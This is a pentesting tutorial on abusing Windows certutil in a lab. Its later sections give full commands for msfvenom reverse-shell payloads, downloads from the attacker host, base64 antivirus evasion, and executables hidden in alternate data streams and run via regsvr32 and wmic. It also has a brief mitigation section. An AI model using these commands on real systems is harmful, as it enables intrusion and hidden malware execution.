In this
article, we are going to describe the utility of Certutil tool and how vital it
is in Windows Penetration Testing.
TL;
DR
Certutil is a
preinstalled tool on Windows OS that can be used to download malicious files
and evade Antivirus. It is one of the Living Off Land (LOL) Binaries.
Disclaimer
The main
objective of publishing the series of “Windows for Pentester” is to introduce
the circumstances and any kind of hurdles that can be faced by any Pentester
while solving CTF challenges or OSCP labs which are based on Windows Operating
System. Here, we do not criticize any kind of misconfiguration that a network
or system administrator does for providing higher permissions on any kind of programs/binaries/files
& etc.”
Table
of Content
·
Introduction
o What is certutil?
o What is Living off Land?
o Working with certutil?
o What is Alternative Data Stream (ADS)?
·
Configurations
used in Practical
·
Working
with certutil
o Encoding
o Decoding
o Hashing
o Downloading
o Reading Error Code
·
Penetration
Testing using certutil
o Compromising using Malicious Executable
o Compromising with Encoded Malicious DLL
o Compromising with Malicious Executable inside
ADS
·
Mitigation
·
Conclusion
Introduction
What is Certutil?
Certutil is a
CLI program that can be used to dump and display certificate authority (CA),
configuration information, configures Certificate Services, backup and restore
CA components, and verify certificates, key pairs, and certificate chains. It
is installed as a part of Certificate Services.
What is Living off Land?
In simple
words, it is an attack that works on the idea of using system tools as
backdoors. File-less attack is another example of LOL attack. Attackers who use
this tactic works with trusted, in most cases, preinstalled system tools to
carry out their attack. Attackers use these tactics to hide their malicious
activity in plain sight among the other general activity inside the network or
system. As these kinds of attacks operate without triggering any alerts, it is
almost impossible for investigators to determine who is behind the said
malicious activity even if they discover it.
What is Alternative Data Stream (ADS)?
The NTFS file
system consists of the ADS feature. This is an inconspicuous feature that was
included, to provide compatibility with files in the Macintosh file system. ADS
enable files to incorporate more than one stream of data. In any instance, each
file consists of at least one data stream. This default data stream in Windows
is recognized as :$DATA.
Windows
Explorer can't see what ADSs are in a file (or a way to erase them without
actually discarding the original file) but they can be created and accessed
with ease. Because they are challenging to detect, thus often used by hackers
to hide files on machines that they've compromised. Executables in ADSs can be
executed from the command line but without showing up in Windows Explorer.
Some of the CTF
Challenges over HackTheBox where certutil can be used are:
Access,
Arctic, BigHead, Conceal, Ethereal, Fighter, Giddy, Hackback, Jerry, Rabbit.
Configurations
used in Practical
Attacker:
·
OS: Kali Linux 2019.4
·
IP: 192.168.1.10
Target:
·
OS: Windows 10 (Build 18363)
·
IP: 192.168.1.11
Working
with certutil
Practical #1: Encoding
Certutil
contains an encode parameter. It could help to encode file content into Base64.
This is a Windows equivalent to the base64 command in Linux.
When working
with an executable file, we came across a scenario. In it, the uploading of the
executable file was not smooth. We can use certutil to encode the executable
file. Then transfer the encoded data, then decode it on the recipient machine.
In the
following practical, we first created a text file named "file.txt"
and wrote the "This is a plain text" line in it. We did this with
Add-Content cmdlet in PowerShell. We can see that it worked when we checked the
file using type command. To convert, we will use certutil with encode
parameter. We will provide the text file and the file that it should write the
encoded data.
Certutil adds
two segments "BEGIN CERTIFICATE" and "END CERTIFICATE". The
converted contents of the file are between these two segments. We can check the
encoded text using the type command.
Add-Content
file.txt "This is a plain text"
type .\file.txt
certutil
-encode file.txt encoded.txt
type
.\encoded.txt
We can use
the parameter -encodehex to convert data into Hex encoded files.
Practical #2: Decoding
Certutil can
decode the data encoded in Base64. Let's show you a quick method from which you
can decode the data. We will be using the file that we encoded in the previous
practical. We will use certutil with -decode parameter. Then provide the
encoded file and the file it should write the decoded data. We can check the
decoded text using the type command.
type
.\encoded.txt
certutil
-decode encoded.txt decoded.txt
type
.\decoded.txt
We can use
the parameter -decodehex to decode the Hex encoded files.
Practical #3: Hashing
Hashing means
taking data and giving out an output string of a fixed length. Using the
cryptography hashing algorithms — e.g., MD5, SHA-1, SHA-256, you can verify if
two files are identical or not. The checksum is a hash value used for
performing data integrity checks. It’s a kind of signature for a file. By
comparing checksum, we can identify duplicate files.
Time to
generate some hashes. We will use the file.txt we created earlier. First, we
will generate the MD5 hash using certutil parameter -hashfile. With the
parameter, file path and algorithm we can hash the file.
certutil
-hashfile ".\file.txt" md5
certutil
-hashfile ".\file.txt" sha1
certutil
-hashfile ".\file.txt" sha256
NOTE: While working with Systems like Windows 7,
keep in mind that the hash algorithms are case-sensitive. Be sure to type, for
example, “MD5”, not “md5”.
Practical #4:
Downloading
In scenarios,
where wget, BITSAdmin or any other convention method is blocked. Certutil can
be used to download files from the internet. We will be downloading 7zip.exe
from the 7zip server as shown in the image.
|
-URLCache
|
Display
or delete URL cache entries
|
|
-split
|
Split
embedded ASN.1 element & Save to files
|
|
-f
|
Force
Overwrite
|
certutil.exe
-urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
dir
Practical #5: Reading Error Code
Suppose you
got a system error code without any message. You don't have any source to look
up the meaning of the error. This is a common scenario. Certutil can help to
look up the message text for system error codes.
certutil
-error 8200
certutil
-error 0x2009
NOTE: Certutil can perform many more functions
related to CA Certificates but we will be focusing on Penetration Testing for
now.
Penetration
Testing using certutil
Practical #6: Compromising using Malicious Executable
During our
initial assessment, we saw that the certutil was actively downloading files
from the internet without any kind of verification or assessment. This is an
instance that is part of the MITRE | ATT&CK Remote File Copy
Tactic.
Certutil can
be used to copy a file from one system to another to stage some attacking tools
or other files throughout an attack. Files can also be transferred from an
outer attacker-controlled system through a Command and Control Channel to bring
tools or scripts into the target network to support Lateral Movement.
In the
previous practical, we downloaded a file from a remote server. Let's see how we
can compromise a Windows System using a Malicious Executable.
We started
our attack with Exploit Development. We used the msfvenom tool to generate a
Payload for a Reverse TCP Connection to our attacker machine. We provided the
msfvenom with the appropriate LHOST and LPORT. The format of the payload was
set to an Executable(.exe) File. We named it "shell.exe". After
successful execution, the file was created in our "/root" directory.
Now to transfer the newly generated we decided to use the HTTP Server generated
by a Python One-liner.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=1234 -f exe >
shell.exe
python -m
SimpleHTTPServer 80
Now
that the payload is hosted on the server, before executing the payload on the
Target Machine, we need to start a Listener on Attacker Machine to capture the
meterpreter session that would be generated after the execution of the payload.
use
exploit/multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost
192.168.1.10
set lport
1234
exploit
After
successfully starting a listener on the Attacker, its time to move to Target
Machine. Here, we have a PowerShell Terminal. We need to download the payload
to this machine. We will use certutil to fetch it. Certutil will make two
connections to the remote web server using two different User-Agents. They will
be named "Microsoft-CryptoAPI" and "Certutil URL Agent".
NOTE: During our assessment, we found that upon
execution the above command an Access Denied Error is notified. Using
-verifyCTL instead of -URLCache will let you bypass this error.
After the
successful transfer of the Payload to Target Machine. We executed the payload
as shown in the image.
certutil.exe
-urlcache -split -f http://192.168.1.10/shell.exe shell.exe
.\shell.exe
We
went back to our Attacker Machine to see that a meterpreter instance is
generated and captured by our listener. We run sysinfo to see the details of
the Target System.
sysinfo
We have
successfully Compromised the Target Machine using a combination of Certutil and
a Malicious Executable.
Practical #7: Compromising with Encoded Malicious DLL
As seen
earlier Certutil encodes file content into Base64. This opens up a lot of
possibilities. This is an instance that is part of MITRE | ATT&CK Deobfuscate/Decode
Files or Information Tactic.
Attackers can
use Obfuscated (Difficult to detect/find) Files to conceal evidence of an
attack from the analysis. Afterward, they may Deobfuscate (Unhide) those files.
This is where certutil comes into the picture. It can decode the data and help
bypass Antivirus, IDS/IPS Software. Certutil can also be used to decode a
portable executable file that has been hidden inside a certificate file.
Payloads may
be compressed, archived, or encrypted to avoid detection. These payloads may be
used with Obfuscated Files or Information during Initial Access or later to
mitigate detection. Sometimes a user's action may be required to open it for
deobfuscation or decryption as part of User Execution. The user may also be
required to input a password to open a password protected compressed/encrypted
file that was provided by the attacker. Now onto our Practical.
We started
our attack with Exploit Development. We used the msfvenom tool to generate a
Payload for a Reverse TCP Connection to our attacker machine. We provided the msfvenom
with the appropriate LHOST and LPORT. The format of the payload was set to a
Dynamic-Link Library(.dll) File. We named it "dll.txt". We can name
it any other name which is less suspicious. We use the text file so that it
doesn't rise any unnecessary flags. After successful execution, the file was
created in our "/root" directory. Now to transfer the newly generated
we decided to use the HTTP Server generated by a Python One-liner.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=1234 -f dll >
dll.txt
python -m
SimpleHTTPServer 80
Now
that the payload is hosted on the server, before executing the payload on the
Target Machine, we need to start a Listener on Attacker Machine to capture the
meterpreter session that would be generated after the execution of the payload.
use
exploit/multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost
192.168.1.10
set lport
1234
exploit
After
successfully starting a listener on the Attacker, it times to move to Target
Machine. Here, we have a PowerShell Terminal. We need to download the payload
to this machine and we need to do this discreetly. We run certutil with a
combination of URLCache and encode separated by the pipe (|). Now the file will
be downloaded as a text file and gets encoded as another text file which we
named "edll.txt" for encoded DLL.
certutil
-urlcache -split -f http://192.168.1.10/dll.txt dll.txt | certutil -encode dll.txt
edll.txt
Now
to execute the payload to compromise the target, we need to decode it. We use
the decode parameter in certutil to decode the payload and saved it as
"exploit.dll". Now to execute this DLL we decide to use regsvr32. It
executes DLL directly into memory.
certutil
-decode .\edll.txt exploit.dll
regsvr32 /s
/u .\exploit.dll
We went back
to our Attacker Machine to see that a meterpreter instance is generated and
captured by our listener. We run sysinfo to see the details of the Target
System. We have successfully Compromised the Target Machine using a combination
of Certutil and an Encoded Malicious Executable.
sysinfo
As we talked
about evading Antivirus Software. Let's inspect the files that we generated and
used in the attempt to compromise the target. We use VirusTotal for this
analysis. We first inspect the "dll.txt". Upon successful upload and
analysis of the dll.txt, we see that it was detected by 54 out of 67 Antivirus
Engines. That can't be good.
So, the
inspection of the dll.txt file was not acceptable. Now let's test the file we
encoded using certutil. We uploaded the edll.txt. Upon analysis of the
edll.txt, we see that it was detected by 4 out of 56 Antivirus Engines. It is
not perfect but it is a huge difference.
Another flavour
of this attack can be as depicted below:
We create a
payload in the form of an executable(payload.exe). Then we use certutil to
encode it to a specific binary. For example, "payload.enc". Then post
the output of the encoding process on Github, Pastebin or other alternative
services. The purpose of this procedure is to separate the encoded payload from
the stager to avoid detection. Now use the certutil on the target machine to
download the content from the remote server (Github/Pastebin). Finally, decode
the malicious payload into an executable extension using Certutil and execute
it to compromise the Target.
Practical #8: Compromising with Malicious Executable
inside ADS
We started
our attack with Exploit Development. We used the msfvenom tool to generate a
Payload for a Reverse TCP Connection to our attacker machine. We provided the
msfvenom with the appropriate LHOST and LPORT. The format of the payload was
set to an Executable(.exe) File. We named it "virus.exe". After
successful execution, the file was created in our "/root" directory.
Now to transfer the newly generated we decided to use the HTTP Server generated
by a Python One-liner.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=443 -f exe >
"virus.exe"
python -m
SimpleHTTPServer 80
Now
that the payload is hosted on the server, before executing the payload on the
Target Machine, we need to start a Listener on Attacker Machine to capture the
meterpreter session that would be generated after the execution of the payload.
use
exploit/multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost
192.168.1.10
set lport
1234
exploit
This
time we will use a different approach altogether. We are going to use the
Alternative Data Stream. Alternative Data Stream (ADS) was created by Microsoft
to supporting compatibility with Apple McIntosh’s file system. In the Mac,
files have a huge amount of metadata in addition to regular data. To save the exe
file into ADS, we need to specify the name of the file in whose ADS we want to
save another file, then (:) followed by name and extension of another file. As
shown, we saved the virus.exe inside the ADS of harmless.txt file.
certutil.exe
-urlcache -split -f http://192.168.1.10/virus.exe harmless.txt:virus.exe
Here,
it can be observed that there is no file named virus.exe in the directory and
the size of harmless.txt is 0 as well as it contains nothing as it was an
originally an empty text file.
dir
type
.\harmless.txt
Now to
execute the file that we put in the ADS; we will be using wmic. We will use the
create flag followed by the path of the payload as shown in the image. It says
that the Execution was successful.
wmic process
call create "c:\harmless.txt:virus.exe"
We went back
to our Attacker Machine to see that a meterpreter instance is generated and
captured by our listener. We run sysinfo to see the details of the Target
System.
sysinfo
We have
successfully Compromised the Target Machine using a combination of Certutil and
a Malicious Executable concealed in Alternative Data Stream.
Mitigation
As tools like
certutil can be used by an attacker with physical access to the machine or by
malicious code unknowingly downloaded by a user after a phishing or other
social engineering attack.
Certutil
usage should be monitored, particularly if detected it being used with -decode
or -decodeHex options where that would not normally be expected in your
network. It is paramount not to depend on tools that simply whitelist built-in
or signed code as obviously these will be bypassed by such Living Off the Land
(LOL) techniques.
Conclusion
This kind of
attack is very much happening in real life. There have been multiple incidents
targeted to different office environments as well as banks. It was a fun
learning experience working with certutil. We are going to write more articles
about other LOLS that we could find. Stay Tuned.
Author: Pavandeep Singh is
a Technical Writer, Researcher and Penetration Tester Contact here
